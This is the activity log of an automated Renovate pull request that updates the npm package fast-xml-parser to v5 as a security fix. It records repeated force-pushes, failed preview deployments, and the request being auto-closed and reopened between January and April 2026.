This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot had a problem deploying to preview-205/merge January 31, 2026 00:39 Failure
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from d28b712 to 3d3eb38 Compare February 12, 2026 11:47
@renovate renovate Bot had a problem deploying to preview-205/merge February 12, 2026 11:47 Failure
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch from 3d3eb38 to 7e698ff Compare February 27, 2026 17:29
@renovate renovate Bot had a problem deploying to preview-205/merge February 27, 2026 17:29 Failure
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/npm-fast-xml-parser-vulnerability branch March 27, 2026 00:46
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 7e698ff to cdbb1c2 Compare March 30, 2026 17:58
@renovate renovate Bot had a problem deploying to preview-205/merge March 30, 2026 17:58 Failure
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed Apr 27, 2026
@renovate renovate Bot closed this Apr 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency fast-xml-parser to v5 [security] - autoclosed chore(deps): update dependency fast-xml-parser to v5 [security] Apr 27, 2026
@renovate renovate Bot reopened this Apr 27, 2026
@renovate renovate Bot force-pushed the renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from cdbb1c2 to 44ca865 Compare April 27, 2026 20:57
@renovate renovate Bot had a problem deploying to preview-205/merge April 27, 2026 20:57 Failure
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants